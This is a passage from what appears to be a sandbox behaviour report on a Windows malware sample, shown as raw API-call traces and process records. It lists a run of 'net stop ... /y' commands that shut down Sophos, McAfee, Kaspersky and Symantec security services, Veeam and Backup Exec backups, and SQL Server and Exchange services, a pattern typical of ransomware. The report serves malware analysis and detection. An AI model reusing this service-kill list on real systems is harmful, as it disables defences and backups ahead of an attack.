(hMem=0x513e48) returned 0x0 [0121.662] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x17 [0121.662] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0121.662] LocalFree (hMem=0x513e48) returned 0x0 [0121.662] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x18 [0121.662] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0121.662] LocalFree (hMem=0x513e48) returned 0x0 [0121.662] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x2a [0121.662] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0121.662] LocalFree (hMem=0x513e48) returned 0x0 [0121.662] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0xcf7e0, nSize=0x0, Arguments=0xcf7dc | out: lpBuffer="㹈Q⡋盺\x0c㹈Q\x0c") returned 0x15 [0121.662] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0121.662] GetFileType (hFile=0x0) returned 0x0 [0121.662] GetConsoleOutputCP () returned 0x1b5 [0121.662] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0121.662] malloc (_Size=0x16) returned 0x7a26e8 [0121.662] GetConsoleOutputCP () returned 0x1b5 [0121.662] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x7a26e8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0121.663] WriteFile (in: hFile=0x0, lpBuffer=0x7a26e8, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0xcf7fc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcf7fc, lpOverlapped=0x0) returned 0 [0121.663] free (_Block=0x7a26e8) [0121.663] LocalFree (hMem=0x513e48) returned 0x0 [0121.663] NetApiBufferFree (Buffer=0x511b20) returned 0x0 [0121.663] NetApiBufferFree (Buffer=0x511b38) returned 0x0 [0121.663] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop “Sophos Device Control Service” /y" [0121.663] exit (_Code=1) Process: id = "251" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5b049000" os_pid = "0xdb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop sacsvr /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 646 os_tid = 0xdf4 Process: id = "252" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5a661000" os_pid = "0xe94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop “Sophos Agent” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 648 os_tid = 0xe08 Process: id = "253" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5ca66000" os_pid = "0x10f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop VeeamDeploymentService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 649 os_tid = 0x1124 Process: id = "254" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5b26b000" os_pid = "0x10f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop “Sophos Health Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 650 os_tid = 0x1068 Process: id = "255" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5a971000" os_pid = "0xe68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop mfevtp /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 651 os_tid = 0xe70 Process: id = "256" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5ae76000" os_pid = "0x1324" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop “Sophos System Protection Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 652 os_tid = 0xd3c Process: id = "257" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5a97c000" os_pid = "0xc90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop BackupExecRPCService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 653 os_tid = 0x6c8 Process: id = "258" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x59d81000" os_pid = "0xfcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SQLAgent$CXDB /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 654 os_tid = 0x13d0 Process: id = "259" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5a586000" os_pid = "0xdac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop EraserSvc11710 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 655 os_tid = 0xf40 Process: id = "260" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5bc8b000" os_pid = "0x13e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop AVP /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 656 os_tid = 0x115c Process: id = "261" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5b290000" os_pid = "0xf68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop BackupExecVSSProvider /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 657 os_tid = 0x13e4 Process: id = "262" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5b595000" os_pid = "0xdf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQL$SHAREPOINT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 658 os_tid = 0xf3c Process: id = "263" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5d59a000" os_pid = "0xe54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop DCAgent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 659 os_tid = 0xed8 Process: id = "264" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5b69f000" os_pid = "0xd50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop svcGenericHost /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 660 os_tid = 0xf08 Process: id = "265" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5e9a4000" os_pid = "0xe90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SQLAgent$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 661 os_tid = 0xf14 Process: id = "266" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5cda9000" os_pid = "0xe04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop swi_filter /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 662 os_tid = 0xf28 Process: id = "267" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4fe5c000" os_pid = "0xe14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQLFDLauncher$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 663 os_tid = 0xe28 Process: id = "268" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5ae69000" os_pid = "0xe88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop ReportServer$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 666 os_tid = 0xec0 Process: id = "269" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4f6f4000" os_pid = "0x1c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "99" os_parent_pid = "0xfc0" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeIS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 667 os_tid = 0xa24 [0123.623] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfb8c | out: lpSystemTimeAsFileTime=0x2cfb8c*(dwLowDateTime=0x1d6c1530, dwHighDateTime=0x1d6f0d1)) [0123.623] GetCurrentProcessId () returned 0x1c4 [0123.623] GetCurrentThreadId () returned 0xa24 [0123.623] GetTickCount () returned 0x115228f [0123.623] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfb84 | out: lpPerformanceCount=0x2cfb84*=24272361902) returned 1 [0123.623] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0123.623] __set_app_type (_Type=0x1) [0123.623] __p__fmode () returned 0x770331f4 [0123.623] __p__commode () returned 0x770331fc [0123.623] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0123.623] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0123.624] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0123.624] GetConsoleOutputCP () returned 0x1b5 [0123.624] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0123.624] SetThreadUILanguage (LangId=0x0) returned 0x409 [0123.627] sprintf_s (in: _DstBuf=0x2cfb44, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0123.627] setlocale (category=0, locale=".437") returned="English_United States.437" [0123.629] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3f8 [0123.629] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0123.629] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeIS /y" [0123.629] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cf910, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0123.629] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x6c) returned 0x703ae0 [0123.629] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0123.629] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2cfb14 | out: Buffer=0x2cfb14*=0x701ae8) returned 0x0 [0123.629] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2cfb14 | out: Buffer=0x2cfb14*=0x701b00) returned 0x0 [0123.630] _fileno (_File=0x77032900) returned -2 [0123.630] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0123.630] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0123.630] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0123.630] _wcsicmp (_String1="config", _String2="stop") returned -16 [0123.630] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0123.630] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0123.630] _wcsicmp (_String1="file", _String2="stop") returned -13 [0123.630] _wcsicmp (_String1="files", _String2="stop") returned -13 [0123.630] _wcsicmp (_String1="group", _String2="stop") returned -12 [0123.630] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0123.630] _wcsicmp (_String1="help", _String2="stop") returned -11 [0123.630] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0123.630] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0123.630] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0123.630] _wcsicmp (_String1="session", _String2="stop") returned -15 [0123.630] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0123.630] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0123.630] _wcsicmp (_String1="share", _String2="stop") returned -12 [0123.630] _wcsicmp (_String1="start", _String2="stop") returned -14 [0123.630] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0123.630] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0123.630] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0123.630] _wcsicmp (_String1="accounts", _String2="MSExchangeIS") returned -12 [0123.630] _wcsicmp (_String1="computer", _String2="MSExchangeIS") returned -10 [0123.630] _wcsicmp (_String1="config", _String2="MSExchangeIS") returned -10 [0123.630] _wcsicmp (_String1="continue", _String2="MSExchangeIS") returned -10 [0123.630] _wcsicmp (_String1="cont", _String2="MSExchangeIS") returned -10 [0123.630] _wcsicmp (_String1="file", _String2="MSExchangeIS") returned -7 [0123.630] _wcsicmp (_String1="files", _String2="MSExchangeIS") returned -7 [0123.630] _wcsicmp (_String1="group", _String2="MSExchangeIS") returned -6 [0123.630] _wcsicmp (_String1="groups", _String2="MSExchangeIS") returned -6 [0123.630] _wcsicmp (_String1="help", _String2="MSExchangeIS") returned -5 [0123.630] _wcsicmp (_String1="helpmsg", _String2="MSExchangeIS") returned -5 [0123.631] _wcsicmp (_String1="localgroup", _String2="MSExchangeIS") returned -1 [0123.631] _wcsicmp (_String1="pause", _String2="MSExchangeIS") returned 3 [0123.631] _wcsicmp (_String1="session", _String2="MSExchangeIS") returned 6 [0123.631] _wcsicmp (_String1="sessions", _String2="MSExchangeIS") returned 6 [0123.631] _wcsicmp (_String1="sess", _String2="MSExchangeIS") returned 6 [0123.631] _wcsicmp (_String1="share", _String2="MSExchangeIS") returned 6 [0123.631] _wcsicmp (_String1="start", _String2="MSExchangeIS") returned 6 [0123.631] _wcsicmp (_String1="stats", _String2="MSExchangeIS") returned 6 [0123.631] _wcsicmp (_String1="statistics", _String2="MSExchangeIS") returned 6 [0123.631] _wcsicmp (_String1="stop", _String2="MSExchangeIS") returned 6 [0123.631] _wcsicmp (_String1="time", _String2="MSExchangeIS") returned 7 [0123.631] _wcsicmp (_String1="user", _String2="MSExchangeIS") returned 8 [0123.631] _wcsicmp (_String1="users", _String2="MSExchangeIS") returned 8 [0123.631] _wcsicmp (_String1="msg", _String2="MSExchangeIS") returned 2 [0123.631] _wcsicmp (_String1="messenger", _String2="MSExchangeIS") returned -14 [0123.631] _wcsicmp (_String1="receiver", _String2="MSExchangeIS") returned 5 [0123.631] _wcsicmp (_String1="rcv", _String2="MSExchangeIS") returned 5 [0123.631] _wcsicmp (_String1="netpopup", _String2="MSExchangeIS") returned 1 [0123.631] _wcsicmp (_String1="redirector", _String2="MSExchangeIS") returned 5 [0123.631] _wcsicmp (_String1="redir", _String2="MSExchangeIS") returned 5 [0123.631] _wcsicmp (_String1="rdr", _String2="MSExchangeIS") returned 5 [0123.631] _wcsicmp (_String1="workstation", _String2="MSExchangeIS") returned 10 [0123.631] _wcsicmp (_String1="work", _String2="MSExchangeIS") returned 10 [0123.631] _wcsicmp (_String1="wksta", _String2="MSExchangeIS") returned 10 [0123.631] _wcsicmp (_String1="prdr", _String2="MSExchangeIS") returned 3 [0123.631] _wcsicmp (_String1="devrdr", _String2="MSExchangeIS") returned -9 [0123.631] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeIS") returned -1 [0123.631] _wcsicmp (_String1="server", _String2="MSExchangeIS") returned 6 [0123.631] _wcsicmp (_String1="svr", _String2="MSExchangeIS") returned 6 [0123.631] _wcsicmp (_String1="srv", _String2="MSExchangeIS") returned 6 